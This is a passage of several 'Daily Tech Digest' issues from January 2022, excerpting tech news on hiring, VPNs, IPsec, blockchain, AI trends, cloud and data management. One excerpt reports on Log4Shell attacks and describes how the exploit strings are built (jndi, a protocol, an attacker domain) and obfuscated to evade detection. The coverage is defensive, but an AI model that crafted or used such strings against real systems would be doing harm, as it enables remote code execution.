Daily Tech Digest - January 06, 2022

Do tech firms in India really need a 3 month notice period?

Experts have highlighted that a three month notice period heavily costs the company from which the candidate resigns. This is because the candidate will have a lower level of productivity since they already have one foot out of the door, which leads to a loss of time and resources for the company. From the candidate’s point of view, a 3 month notice period may hinder their chance to be hired by a new organisation as the long duration between hiring and joining creates a level of uncertainty. ... When asked about his take on the idea of a 15 day notice period for tech companies, the CEO of NetConnect Global, Mr Sunil Bist, said, “I think it is a great idea when you think about employee growth. After the pandemic, we have seen an acute competition spree to hire the right talent as soon as possible—a more extended notice period would mean losing out on it because of time constraints. ...” In his opinion, “The current norm of a 3 months notice period in most tech companies was started with good intentions, but what a company needs to see is whether it serves its intended purpose.” 


Tailscale: A Virtual Private Network for Zero Trust Security

Unlike traditional, hub-and-spoke VPN network architectures that send network traffic through a central gateway, Tailscale creates a peer-to-peer mesh network. This mesh topology connects each device to every other device directly. A hub-and-spoke architecture is simpler than mesh, but it’s got some downsides: higher latency for remote users, not allowing direct connections between individual nodes, being harder to scale, and providing a single point of failure that can break the entire network. In contrast, a peer-to-peer mesh network results in lower latency and higher throughput and eliminates the need to manually configure port forwarding. It also allows for connection migration: existing connections are maintained even when switching to a different network, such as from WiFi to wired. The idea of mesh VPNs has been around for a while, mostly for niche uses. But the advent of cloud-based infrastructure coupled with the rise in remote workers has made organizations take a closer look at them, wrote senior writer Lucian Constantin in CSO Online.


Researchers used electromagnetic signals to classify malware infecting IoT devices

The researchers proposed a novel approach of using side channel information to identify malware targeting IoT systems. The technique could allow analysts to determine malware type and identity, even when the malicious code is heavily obfuscated to prevent static or symbolic binary analysis. ... The team analyzed power side-channel signals using Convolution Neural Networks (CNN) to detect malicious activities on IoT devices. The collected data is very noisy for this reason the researchers needed a preprocessing step to isolate relevant informative signals. This relevant data was used to train neural network models and machine learning algorithms to classify malware types, binaries, obfuscation methods, and detect the use of packers. The academics collected 3 000 traces each for 30 malware binaries and 10 000 traces for benign activity. They recorded 100,000 measurement traces from an IoT device that was infected by various strains of malware and realistic benign activity.


Microsoft Sees Rampant Log4j Exploit Attempts, Testing

Most recently, Microsoft has observed attackers obfuscating the HTTP requests made against targeted systems. Those requests generate a log using Log4j 2 that leverages Java Naming and Directory Interface (JNDI) to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. Microsoft has observed many attacks in which the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems. The crafted string that enables Log4Shell exploitation contains “jndi,” following by the protocol – such as “ldap,” “ldaps” “rmi,” “dns,” “iiop,” or “http” – and then the attacker domain. But to evade detection, attackers are mixing up the request patterns: For example, Microsoft has seen exploit code written that runs a lower or upper command within the exploitation string. Even more complicated obfuscation attempts are being made to try to bypass string-matching detections


How IPsec works, it’s components and purpose

An IPsec VPN connection starts with establishment of a Security Association (SA) between two communicating computers, or hosts. In general, this involves the exchange of cryptographic keys that will allow the parties to encrypt and decrypt their communication. (For more on how cryptography works in general, check out CSO's cryptography explainer.) The exact type of encryption used is negotiated between the two hosts automatically and will depend on their security goals within the CIA triad; for instance, you could encrypt messages to ensure message integrity ... The information about the SA is passed to the IPsec module running on each of the communicating hosts, and each host's IPsec module uses that information to modify every IP packet sent to the other host, and to process similarly modified packets received in return. These modifications can affect both the packet’s header—metadata at the beginning of the packet explaining where the packet is going, where it came from, its length, and other information—and its payload, which is the actual data being sent.


Google makes the perfect case for why you shouldn't use Chrome

MV3 doesn't just create issues for end-users. Developers could face challenges as well. According to the EFF: "The changes in Manifest V3 won't stop malicious extensions but will hurt innovation, reduce extension capabilities and harm real-world performance. Google is right to ban remotely hosted code (with some exceptions for things like user scripts), but this is a policy change that didn't need to be bundled with the rest of Manifest V3." The EFF is spot on. Yes, Google should (with few exceptions) ban remote code. But releasing guidance that breaks so much functionality for third-party extensions isn't the way to go. And for developers, this could lead to many of them having to work with two different code bases—one for Chrome and one for all other browsers. That's a proposition many devs won't accept. Is it in Google's best interest to prevent the development and usage of ad-blocking extensions? Probably not. But by creating guidance that prevents those developers from creating non-malicious (often helpful) addons, they are putting themselves in a rather awkward position. 


breathing.ai Founder Hannes Bend on Improving Mental Health at Work in 2022

Developed based on extensive research, the breathing.ai Chrome extension is built on state-of-the-art machine learning that uses the webcam to detect breathing and heart rate and when the user may need a break from the screen and work. Based on which ones are the most calming or performance-improving, personalized break reminders are either breath work, meditation, movement, or simply a suggested break from the screen. The over 100 exercises include simple short deep breathing as breathwork, body scan as meditations, shoulder rolls for movements, or a short walk for just a break from screens. All exercises offer 20 seconds to 2 minutes short practices to build mindfulness and wellness into the daily flow. The extension also provides soothing background sounds. ... We are currently focused on making screens adaptive to vital signs, and our long-term vision and patent aim to create adaptive interfaces for audio and olfactory devices. Our interfaces, adaptive to the user’s nervous system, will be used only for screens but also as voice assistants and other audio use cases, personalized diffusers and other olfactory devices, personalized IoT, cars, and all interface-based technological interactions.


Blockchain And You - How Will Blockchain Affect Your Future

Let’s look at a simple health care use case on a private blockchain. In this scenario, patient records are the data blocks, and the transactions that update the data blocks are the chains. This means that all patient information and any updates made to the patient information are recorded in the data block. For example, the data block stores prescription information and the procedures performed on the patient. All the data on the data block is immutable and traceable. If the data block is shared with a designated party, this transaction is also traceable. Transferring a patient’s medical records from one hospital to another hospital is easy and secure using blockchain. Additionally, since all the data blocks are immutable, the patient’s records can be used automatically as the input of future interactions. Think back to when we discussed filing insurance claims. The information in the patient’s record, such as medications or the procedures, could automatically trigger insurance claims. The patient no longer needs to collect all their bills and determine which items might be covered by their insurance policy.


Top technology trends come down to CIO strategy in 2022

Generative AI, algorithms that assess existing data, such as text, audio or visual files, recognize the underlying pattern of that data and then replicate the pattern to generate similar content, is a top technology trends for CIOs to watch in 2022, Groombridge said. Generative AI can be used to discover new products in research and development settings, he said. "There have been uses of it to identify new medicines and it was even used to rapidly identify potential treatments for COVID, for example," he said. On the operational side of AI, Groombridge said it will be crucial for CIOs to pay attention to AI engineering, a discipline focused on designing systems and applications to better utilize and optimize AI in the enterprise. As businesses recognize AI's potential and rush to build products, they will likely encounter a new challenge -- maintaining the AI algorithms. As input data for models changes and as business outcomes change, the models themselves need adjusting. Lack of maintenance can cause the AI algorithms to eventually lose value, Groombridge said.


Howto create opportunities in the fragmented European marketplace

As the world continues to change and markets continue to develop, it is vital for market participants to ensure they are capable of accessing the required markets and services in a stated period of time, while they also need to be able to move to locations where their presence is needed so as to keep ahead over their rivals. Nonetheless, new opportunities tend to emerge from transition. Changes allow organisations to re-evaluate their trading strategies, contemplate utilising new third-party service providers, such as hosting and infrastructure services, and ponder how they can increase their operatorial efficiencies as well as improve the overall trading experience. In these uncertain times, having access to a ready-made, up to standard trading ecosystem is both a necessity and key differentiator for trading companies. The environment should have adaptive on-demand connectivity which uses numerous malleable channels and solutions, not to mention co-location services, so as connectivity can be provided to all major hubs. 



Quote for the day:

Don’t be afraid to give up the good to go for the great. -- John D. Rockefeller

Daily Tech Digest - January 05, 2022

5 Cloud Native Trends to Watch out for in 2022

With the emphasis on cybersecurity, I expect to see open source projects and commercial offerings squarely focused on cloud native security. Two areas will get the attention — software supply chain and eBPF. The software supply chain closely mimics the supply chain of real-world commerce where resources are consumed, then transformed, through a series of steps and processes, and finally supplied to the customer. Modern software development is about assembling and integrating various components available in the public domain as open source projects. In the complex supply chain of software, a compromised piece of software can cause severe damage to multiple deployments. Recent incidents involving CodeCov, Solarwinds, Kaseya, and the ua-parser-js NPM package highlight the need to secure the software supply chain. In 2022, there will be new initiatives, projects, and even new startups focusing on secure software supply chain management. The other exciting trend is eBPF that enables cloud native developers to build secure networking, service mesh, and observability components.


Second-generation AI-powered digital pills are changing the future of healthcare

Many chronic diseases move along a dynamic trajectory that creates a challenge of unpredictable progression. This is often disregarded by first-generation AI as it requires constant adaptation of therapeutic regimens. Also, many therapies do not show loss of response until even a few months. The second-generation AI systems are designed to improve response to therapies and facilitate analysing inter-subject and intra-subject variabilities in response to therapies over time. Most first-generation AI systems extract data from large databases and artificially impose a rigid “one for all” algorithm on all subjects. Attempts to constantly amend treatment regimens based on big data analysis might be irrelevant for an individual patient. Imposing a “close to optimal” fit on all subjects does not resolve difficulties associated with dynamicity and the inherent variability of biological systems. The second-generation AI systems focus on a single patient as the epicentre of an algorithm and to adapt their output in a timely manner. 


How Walmart Canada Uses Blockchain to Solve Supply-Chain Challenges

A public blockchain network — one that anyone can join without asking for permission — allows unlimited viewing of information stored on it, eliminates intermediaries, and operates independently of any governing party. It is well-suited for digital consumer offerings (like NFT’s), cryptocurrencies, and certifying information such as individuals’ degrees or certificates. But private networks — those that require a party to be granted permission to join it — are often far better suited for businesses because access is restricted to verified members and only parties directly working together can see the specific information they exchange. This better satisfies industrial-grade security requirements. For these reasons, Walmart decided to go with a private network built on Hyperledger Fabric, an open-source platform. ... For Walmart and its carriers, this meant working with each carrier’s unique data (vendor name, payment terms, contract duration, and general terms and conditions), which is combined with governing master tables of information such as fuel rates and tax rates. The parties should then jointly agree to the formulas that the blockchain will use to calculate each invoice.


Property Graphs vs. Knowledge Graphs

A property graph uses nodes, relationships, labels, and “properties.” Both the relationships and their connecting nodes of data are named, and capable of storing properties. Nodes can be labeled in support of being part of a group. Property graphs use “directed edges” and each relationship has a start node and an end node. Relationships can also be assigned properties. This feature is useful in presenting additional metadata to the relationships between the nodes. ... Knowledge graphs are very useful in working with data fabric. The semantics feature (and the use of graphs) supports discovery layers and data orchestration in a data fabric. Combining the two makes the data fabric easier to build out incrementally and more flexible, which lowers risk and speeds up deployment. The process allows an organization to develop the fabric in stages. It can be started with a single domain, or a high value use case, and gradually expanded incrementally with more data, users, and use cases. A data fabric architecture, combined with a knowledge graph, supports useful capabilities in many key areas. 


Executive Q&A: Getting the Most from Unstructured Data

The world of ten years ago was dominated by structured data. After 2012, though, as sensors became cheaper, cell phones gradually became smartphones, and cameras were installed to make shooting easier. With this, a large amount of unstructured data was generated, and enterprises entered uncharted territory, making progress slow. Some of the inhibitors to progress in this area include: Complexity: Unlike structured data which can be analyzed intuitively, unstructured data needs to be further processed and then analyzed, usually best done through artificial intelligence. Machine learning algorithms classify and label content from it. However, it is not easy to identify high-quality data from the data set due to the large amount and complexity of unstructured data -- this has been painful for developer teams and a key challenge to data architectures that are already complex. Cost: Although the enterprise recognizes the value of unstructured data, the cost can be a potential obstacle to making use of it. The cost of enterprise infrastructure, human resources, and time can hinder the implementation and development of AI and the data it analyzes.


Google Cloud Attacks Supply Chain Crisis with Digital Twin

“It’s a digital representation of the physical supply chain,” said Hans Thalbauer, the managing director for supply chain and logistics for Google Cloud. “You model all the different locations of your enterprise. Then you model all your suppliers, not just the tier one but tier two, three, and four. You bring in the logistic service providers. You bring in manufacturing partners. You bring in customers and consumers so that you have really the full view.” Once a network of supply chain players has been built out, the customer then starts loading data into their digital twin. The customer starts with their private enterprise data, which typically includes past orders, pricing, costs, and supply and demand forecasts, Thalbauer said. “Then you also want to get information from your business partners,” Thalbauer told Datanami last year. “You share your demands with your suppliers. And they actually loop back to you what is the supply situation. You share the information with the logistics service providers. You share sustainability information with the service provider.”


Fighting fraud in the supply chain with blockchain

Private blockchain platforms are particularly suited to supply chain management because they provide traceability, transparency, real-time logistics tracking, electronic funds transfer and smart contract management. Processes including negotiations support and procurement can also be connected via blockchain to build trust and confidence with new suppliers, partners and colleagues. While private blockchains adhere to the original principles of blockchain and offer all the distributed benefits, they also retain some of the characteristics of more centralised, controlled networks. This improves greater privacy and eliminates many of the illicit activities often associated with public blockchains and cryptocurrencies. No one can enter this type of ‘permissioned’ network without proper authentication, making it ideal where it does not suit an enterprise to allow every participant full access to the entire contents of the database.


Carbon Neutrality Requires Good Data – and Blockchain

Blockchain technology is effective in remedying these problems. As a decentralized, immutable ledger where data can be inputted and shared at every point of action, blockchain works by storing information in interconnected blocks and provides a value-add for insuring carbon offsets. This creates a chain of information that cannot be hacked and can be transmitted between all relevant parties throughout the supply chain. Key players can enter, view, and analyze the same data points securely and with the assurance of the data’s accuracy. In addition, the technology can identify patterns of error, giving actionable insights into where systems or humans may be contributing to the problem. Data needs to move with products throughout the supply chain to create an overall number for carbon emissions. Blockchain’s decentralization offers value to organizations and their respective industries so that more, reliable data can be shared between all parties to shine a light on the areas they need to work on, such as manufacturing operations and the offsets of buildings. 


Developing Deep Learning Systems Using Institutional Incremental Learning

Institutional Incremental Learning is one of the promising ways of addressing data-sharing concerns. Using this approach, organizations can train the model in a secure environment and can share the model without having to share precious data. Institutional Incremental Learning differs from federated learning. In federated learning, all the participants do the training simultaneously. This is challenging, as the centralized server needs to update and maintain models. This results in complex technology and communication requirements. ... After training a model locally, the model, along with the metrics, is shared with participating entities. In this way, the decision to use a particular model lies with the organization, which is going to use them and not be forced by anyone. This truly enables decentralized machine learning, where a model is not only trained but also used at the user's discretion. Incremental institutional learning helps to address catastrophic forgetting. 


Understanding AI’s Limitations Is Key to Unlocking Its Potential

To discern where AI can improve business processes and where it cannot, it’s important to take into account its legal and ethical considerations, its biases and its transparency. Asking critical questions about certain AI applications is critical to setting a project up for success and avoiding risk down the line. From a legal perspective, we must decipher who carries responsibility for a bad judgment call (i.e. a self-driving car hits a pedestrian). We also must recognize that there is bias when working with cognitive-based technology. AI learns from the data it gets; however, it doesn’t have the means to question this data, which means that data sets can easily skew in one direction and leave AI to adopt bias. This can lead to things like discrimination in recruiting processes or racial bias in healthcare management. Businesses that work with AI will also find themselves walking a fine line between trust and transparency. While the intention of advanced AI is to make more independent decisions over time, engineers can run into a “black box” scenario where it’s unclear how the application came to its decision.



Quote for the day:

"To be the improver of improvements you must challenge assumptions, starting with your own." -- Vala Afshar

Daily Tech Digest - January 04, 2022

Team Topology for Machine Learning

Stream-aligned ML Teams are teams that develop and/or manage ML solutions for end-users, i.e., domain experts, or customers in an organization. For example, in a retail company, such a team can be a markdown/discount-pricing team that delivers prices during seasons throughout the year. The scope of the team can vary but should be determined by the cognitive load of the team. For example, if the data sources and regression mechanism of the solution does not vary too much for the in- or sale-seasons then the cognitive load to support both do not double and, hence, a slightly bigger team can develop, operate, and manage the solutions for its stakeholders. On the other hand, for the same industry how online and store channel operates can vary a lot. Therefore, the markdown solution for the online channel may be operated by one team, whereas the same type of solution for the store channel may be operated by a different team. Should such a team develop its own platform or data/infrastructure subsystems?


Connecting the dots on diversity in cybersecurity recruitment

Put simply, a more diverse cybersecurity team is a better cybersecurity team. In a multidisciplinary field like this, different perspectives are critical. When threats and tactics change around us daily, the diverse viewpoints on my team help counter complacency by bringing new thinking to situations. Our adversaries, after all, are continuously trying new tactics, finding new ways to bypass controls and identify vulnerabilities. My team’s different perspectives bring a more disruptive “hacker mindset” to our work in countering attacks. Our industry’s overreliance on specialists with the “right” qualifications and educational backgrounds might actually be a weakness — a point of view reinforced for me by David Epstein’s 2019 book, “Range: Why Generalists Triumph in a Specialized World.” Epstein argues that generalists with wide-ranging interests are more creative, more agile and able to make connections that their more specialized peers can’t see, especially in complex and unpredictable fields — a description that is a good fit for cybersecurity. 


Workplace Trends 2022: The age of employees is here

2022 will see more Gen Z in employment than even before. Organizational culture will have to create space to address the needs of Gen Z. Multiple research shows that this generation has higher conviction in their own strengths and profound belief in dialogue. That means organizations will have to create accessible and better platforms for frequent and candid dialogue and train their Gen X and Gen Y leaders to be open to diverse views. McKinsey’s survey reveals this generation’s quest for truth. As per McKinsey, Gen Z is “True Gen” in contrast to Gen Y - the millennials, sometimes called the “Me Generation”. To attract and retain Gen Z, HR leaders will have to catalyze genuine culture of greatness at the workplace rather than just the labels and brands. They will have to ensure providing this experience of Truth to even interns, as this New Generation is more likely to rely on the experience of their peers rather than labels and brands. When it comes to technology and business models, we're in the midst of a revolution that can't be separated. 


Seven imperatives for moving beyond digital

Many of today’s problems are so massive that no single entity can solve them on its own. These problems can be tackled only by networks of companies and institutions that work together toward a common purpose. For example, think about people’s need for mobility—which requires dealing with public, shared, and privately owned methods of transportation; infrastructure; public 5G networks; energy supply; financing; regulation; and many more factors. The only way for companies to thrive in this disruptive age is to work with ecosystems and harness the capabilities that others have built in order to deliver their own value propositions—and do so at speed, at scale, and flexibly. When a labor shortage loomed in Japan’s construction industry in 2013, Komatsu tried to address the problem by introducing ICT (information and communications technology) construction machinery that used GPS, digital mapping, sensors, and internet-of-things connections to enhance efficiency. But leaders quickly saw that the new machines were not resulting in the expected increase in productivity. The reason? Bottlenecks in processes at the construction site.


Top 5 trends for endpoint security In 2022

Under budget pressure to deliver more with less, CISOs want to consolidate their tech stacks and save the budget for new technologies. Unified Endpoint Management (UEM) proves its value by unifying identity, security, and remote access within Zero Trust Security or ZTNA frameworks now considered essential for securing an anywhere workforce. Like ZTNA, there’s been rapid innovation occurring in UEM over the last twelve months, with reduced security and compliance risks being the goal. UEM’s benefits include streamlining continuous OS updates across multiple mobile devices and platforms, enabling device management, and having an architecture capable of supporting a wide range of devices and operating systems. Another benefit enterprises mention is automating internet-based patching, policy, and configuration management. Unified Endpoint Management (UEM) leaders include Ivanti, whose platform reflects industry leadership with advanced unified endpoint management capabilities.


DataOps will play a pivotal role in financial services growth

Important lessons were learned during the pandemic, not least that banking and other financial institutions’ business models, created pre-COVID, were not suitable for weathering a major crisis. As noted by McKinsey, this could be due to the fact that most business models rely on historical data, “without access to high-frequency data that would enable recalibration”, as well as infrastructure that lacks the agility for effective risk management. In the current landscape of economic recovery, plus the need to navigate the effects of the UK leaving the EU, evolving regulations, intensified competition and more, it’s crucial for financial organisations to rethink their models and data strategies now to strengthen future resilience. Therefore, attention will turn to implementing DataOps practices to make themselves nimble enough to identify and react to sudden micro and macro issues, integrate robust risk assessment and mitigation, and capitalise on newly emerging market opportunities. Further, the digital economy in which we live necessitates an elevated approach to engaging with consumers, who have become accustomed to instantaneous, always-on digital and omnichannel communication and personalisation of products and services on convenient platforms


Death to Tribal Knowledge

If you have existing documentation and people know about it, you’re doing great! The last hurdle to overcome is making sure that your documentation stays up to date. As time passes, processes change and wikis naturally get out of date. Stale documentation with misleading info is the worst, so finding a good way to keep track of existing documentation and showing ownership in updating it when things change is the problem to solve here. New hires in this instance are again one of the best resources you have. If a new hire is setting up their app locally and runs into issues when following the setup documentation, they should take the time to update the documentation with the correct steps. If your company is actively hiring, this ensures that fresh eyes will be following and improving the documentation every month. The same goes for every other current employee. Any time someone finds information in a wiki that is incorrect, they should do their due diligence and update the documentation. Ignoring the bad information won’t make things any easier for the next person who stumbles across the same page.


Bezier Curve Machine Learning Demonstration

This demonstration features ALGLIB, one of the better available numerical analysis libraries for C# programmers that offers several easy-to-use machine learning methods. (Later in this series, we will examine MS CNKT for C# routines.) ALGLIB for C# is available and licensed appropriately as a free, single-threaded edition for individual experimentation and use or as a commercial, multi-threaded edition for purchase. For this demonstration, I will explain at some length how to download and build the free edition as a class library that will need to be included as a reference for the demonstration program to work. For reference, you can go to the ALGLIB Wikipedia page for a description and history, the ALGLIB website for download information and an excellent on-line User’s Guide, and to the download itself for a detailed User’s Manual in .html format. ... Our small demonstration data set was built by selecting pre-classified student histories at random, while insuring a balanced set of demo data representing each status group.


Top Qualities Hiring Managers Look For In Data Scientist Candidates

The ability to code is crucial to good data scientists, that’s why almost every data science role has a technical round. But what’s equally important but sometimes overlooked is the ability to understand the business. Without the business acumen, data scientists will always be the passive implementer of tasks instead of the active thought partners that they should be. Moreover, only when you truly understand the asks and how they fit into the larger business, you are able to problem solve in creative ways without counting on others to prescribe a solution. ... On top of the technical challenge, construct a business case which candidates have to work through. The business case should closely align with the job description. If the role will be conducting a lot of metrics analyses, then the case could be a metrics decomposition type of question; if the role will be mainly building models, then the case could be a realistic business situation that candidates can brainstorm modeling solutions for.


Why businesses should embrace multi-cloud

For many organisations, multi-cloud is inevitable. After all, it’s unlikely there is a single cloud out there that can support all your requirements. Organisations typically use several, to dozens, to hundreds of SaaS products, as well as a handful of IaaS hosting services, and development PaaS. Some applications will work better on certain platforms – cloud native apps should be happy on AWS, Microsoft Azure or Google Cloud, but traditional apps might prefer Oracle Cloud or IBM Cloud. So, a multi-cloud approach enables you to create this best-of-breed environment. But there are also benefits to being able to run workloads across multiple hyperscale cloud environments – something that is being made easier through containerisation. The caveat is that success for a multi-cloud environment lies in bringing all the pieces together in harmony. It’s ensuring the right workload is distributed to the most appropriate cloud and making sure all the cloud services can communicate with one another. Organisations need to establish and understand the core connectivity between, and governance around, these disparate environments.



Quote for the day:

"Distinguished leaders impress, inspire and invest in other leaders." -- Anyaele Sam Chiyson

Daily Tech Digest - January 03, 2022

Get the most value from your data with data lakehouse architecture

A data lakehouse is essentially the next breed of cloud data lake and warehousing architecture that combines the best of both worlds. It is an architectural approach for managing all data formats (structured, semi-structured, or unstructured) as well as supporting multiple data workloads (data warehouse, BI, AI/ML, and streaming). Data lakehouses are underpinned by a new open system architecture that allows data teams to implement data structures through smart data management features similar to data warehouses over a low-cost storage platform that is similar to the ones used in data lakes. ... A data lakehouse architecture allows data teams to glean insights faster as they have the opportunity to harness data without accessing multiple systems. A data lakehouse architecture can also help companies ensure that data teams have the most accurate and updated data at their disposal for mission-critical machine learning, enterprise analytics initiatives, and reporting purposes. There are several reasons to look at modern data lakehouse architecture in order to drive sustainable data management practices.


A CISO’s guide to discussing cybersecurity with the board

When you get a chance to speak with executives, you typically don’t have much time to discuss details. And frankly, that’s not what executives are looking for, anyway. It’s important to phrase cybersecurity conversations in a way that resonates with the leaders. Messaging starts with understanding the C-suite and boards’ priorities. Usually, they are interested in big picture initiatives, so explain why cyber investment is critical to the success of these initiatives. For example, if the CEO wants to increase total revenue by 5% in the next year, explain how they can prevent major unnecessary losses from a cyber attack with an investment in cybersecurity. Once you know the executive team and board’s goals, look to specific members, and identify a potential ally. Has one team recently had a workplace security breach? Does one leader have a difficult time getting his or her team to understand the makings of a phishing scheme? These interests and experiences can help guide the explanation of the security solution. If you’re a CISO, you’re well-versed in cybersecurity, but remember that not everyone is as involved in the subject as you are, and business leaders probably will not understand technical jargon.


Best of 2021 – Containers vs. Bare Metal, VMs and Serverless for DevOps

A bare metal machine is a dedicated server using dedicated hardware. Data centers have many bare metal servers that are racked and stacked in clusters, all interconnected through switches and routers. Human and automated users of a data center access the machines through access servers, high security firewalls and load balancers. The virtual machine introduced an operating system simulation layer between the bare metal server’s operating system and the application, so one bare metal server can support more than one application stack with a variety of operating systems. This provides a layer of abstraction that allows the servers in a data center to be software-configured and repurposed on demand. In this way, a virtual machine can be scaled horizontally, by configuring multiple parallel machines, or vertically, by configuring machines to allocate more power to a virtual machine. One of the problems with virtual machines is that the virtual operating system simulation layer is quite “thick,” and the time required to load and configure each VM typically takes some time. In a DevOps environment, changes occur frequently.


Desktop High-Performance Computing

Many engineering teams rely on desktop products that only run on Microsoft Windows. Desktop engineering tools that perform tasks such as optical ray tracing, genome sequencing, or computational fluid dynamics often couple graphical user interfaces with complex algorithms that can take many hours to run on traditional workstations, even when powerful CPUs and large amounts of RAM are available. Until recently, there has been no convenient way to scale complex desktop computational engineering workloads seamlessly to the cloud. Fortunately, the advent of AWS Cloud Development Kit (CDK), AWS Elastic Container Service (ECS), and Docker finally make it easy to scale desktop engineering workloads written in C# and other languages to the cloud. ... The desktop component first builds and packages a Docker image that can perform the engineering workload (factor an integer). AWS CDK, executing on the desktop, deploys the Docker image to AWS and stands up cloud infrastructure consisting of input/output worker queues and a serverless ECS Fargate cluster.


Micromanagement is not the answer

Neuroscience also reveals why micromanaging is counterproductive. Donna Volpitta, an expert in “brain-based mental health literacy,” explained to me that the two most fundamental needs of the human brain are security and autonomy, both of which are built on trust. Leaders who instill a sense of trust in their employees foster that sense of security and autonomy and, in turn, loyalty. When leaders micromanage their employees, they undermine that sense of trust, which tends to breed evasion behaviors in employees. It’s a natural brain response. “Our brains have two basic operating modes—short-term and long-term,” Volpitta says. “Short-term is about survival. It’s the freeze-flight-fight response or, as I call it, the ‘grasshopper’ brain that is jumping all over. Long-term thinking considers consequences [and] relationships, and is necessary for complex problem solving. It’s the ‘ant’ brain, slower and steadier.” She says micromanagement constantly triggers short-term, survival thinking detrimental to both social interactions and task completion.


Unblocking the bottlenecks: 2022 predictions for AI and computer vision

One of the key challenges of deep learning is the need for huge amounts of annotated data to train large neural networks. While this is the conventional way to train computer vision models, the latest generation of technology providers are taking an innovative approach that enables machine learning with comparatively less training data. This includes moving away from supervised learning to self-supervised and weakly supervised learnings where data availability is less of an issue. This approach, also known as few shot learning, detects objects as well as new concepts with considerably less input data. In many cases the algorithm can be trained with as little as 20 images. ... Privacy remains a major concern in the AI sector. In most cases, a business must share its data assets with the AI provider via third party servers or platforms when training computer vision models. Under such arrangements there is always the risk that the third party could be hacked or even exploit valuable metadata for its own projects. As a result, we’re seeing the rise of Privacy Enhancing Computation, which enables data to be shared between different ecosystems in order to create value, while maintaining data confidentiality.


How Automation Can Solve the Security Talent Shortage Puzzle

Supporting remote and hybrid work requires organizations to invest in and implement new technologies that facilitate needs such as remote access, secure file-sharing, real-time collaboration and videoconferencing. Businesses must also hire professionals to configure, implement and maintain these tools with an eye towards security – a primary concern here, as businesses of all sizes now live or die by the availability and integrity of their data. The increasing complexity of IT environments – many of which are now pressured to support bring-your-own-device (BYOD) policies – has only intensified the need for competent cybersecurity talent. It’s not surprising that the ongoing shortage of trained professionals makes it difficult for organizations to expand their business and adopt new technologies. Almost half a million cybersecurity jobs remain open in the U.S. alone, forcing businesses to compete aggressively to fill these roles. Yet, economic pressures make it particularly difficult for small-to mid-sized businesses (SBMs) to play this game. Most cannot hope to match the high salaries that large enterprises offer.


HIPAA Privacy and Security: At a Crossroads in 2022?

The likely expansion of OCR’s mission into protecting the confidentiality of SUD data comes as actions to enforce the HITECH Breach Notification and HIPAA Security Rule appear to be at a standstill. According to the data compiled by OCR, in 2021 there were more than 660 breaches of the unauthorized disclosure of unsecured PHI reported by HIPAA-covered entities and their business associates that compromised the health information of over 40 million people. A significant number of the breaches reported to OCR appear to show violations of the HIPAA standards due to late reporting and failure to adequately secure information systems or train workforce members on safeguarding PHI. In 2021, OCR announced settlements in two enforcement actions involving compliance with the HIPAA Security Rule standards. OCR has been mum on its approach to enforcement of the HIPAA breach and security rules. One explanation could be the impact being felt by the 5th Circuit Court of Appeals decision overturning an enforcement action against the University of Texas MD Anderson Cancer Center.


Will we see GPT-3 moment for computer vision?

It is truly the age of large models. Each of these models is bigger and more advanced than the previous one. Take, for example, GPT-3 – when it was introduced in 2020, it was the largest language model trained on 175 billion parameters. Fast forward one year, and we already have the GLaM model, which is a trillion weight model. Transformer models like GPT-3 and GLaM are transforming natural language processing. We are having active conversations around these models making job roles like writers and even programmers obsolete. While these can be dismissed as speculations, for now, one cannot deny that these large language models have truly transformed the field of NLP. Could this innovation be extended to other fields – like computer vision? Can we have a GPT-3 moment for computer vision? OpenAI recently released GLIDE, a text-to-image generator, where the researchers applied guided diffusion to the problem of text conditional image synthesis. For GLIDE, the researchers trained a 3.5 billion parameter diffusion model that uses a text encoder. Next, they compared CLIP (Contrastive Language-Image Pre-training) guidance and classifier free guidance.


What is Legacy Modernization

To achieve a good level of agility the systems supporting the organization also have to quickly react and change to the surrounding environment. Legacy systems place a constraint on agility since they are often difficult to change or provide inefficient support to business activities. This is not unusual, at the time of the system design there were perhaps technology constraints that no longer exist, or the system was designed for a particular way of working that is no longer relevant. Legacy Modernization changes or replaces legacy systems, making the organization more efficient and cost-effective. Not only can this optimize existing business processes, but it can open new business opportunities. Security is an important driver for Legacy Modernization. Cyber-attacks on organizations are common and become more sophisticated over time. The security of a system degrades over time, and legacy systems may no longer have the support or the technologies required to deter modern attack methods, this makes them an easy target for hackers. This represents a significant business risk to an organization.



Quote for the day:

"Leadership is particularly necessary to ensure ready acceptance of the unfamiliar and that which is contrary to tradition." -- Cyril Falls

Daily Tech Digest - January 02, 2022

Updating Data Governance: Set Up a Cohesive Plan First

Just because a company has a Data Governance framework it used with a mature technology project, like a data warehouse, does not mean it is sufficient for newer technology initiatives, like machine learning. New business requirements need to be considered, especially where system integration is necessary. For example, Data Quality must be good for all data sets, across the entire enterprise, before machine learning can be applied to a new venture. Danette McGilvray, President and Principal at Granite Falls Consulting, said, “The cold brutal reality is that the data is not good enough to support machine learning in practically every company.” This is only one of many business needs that crop up before succeeding at such an undertaking. Revisiting Data Governance prior to starting a new data project reduces exposure to mistakenly overlooking prerequisites, and moves toward a unified Data Management approach. Rethinking older Data Governance plans alone does not necessarily lead to a more coherent Data Governance. 


A Hands-On Guide to Outlier Detection with Alibi Detect

Data points that are unusually far apart from the rest of the observations in a dataset are known as outliers. They are primarily caused by data errors (measurement or experimental errors, data collection or processing errors, and so on) or naturally very singular and different behaviour from the norm, for example, in medical applications, very few people have upper blood pressure greater than 200, so If we keep them in the dataset, our statistical analysis, and modelling conclusions will be skewed. To name a few, they can alter the mean and standard deviation values. As a result, it’s critical to accurately detect and handle outliers, either by removing them or reducing them to a predefined value. Outlier detection is thus critical for identifying anomalies whose model predictions we can’t trust and shouldn’t use in production. The type of outlier detector that is appropriate for a given application is determined by the data’s modality and dimensionality, as well as the availability of labelled normal and outlier data and whether the detector is pre-trained (offline) or updated online.


How a startup uses AI to put worker safety first

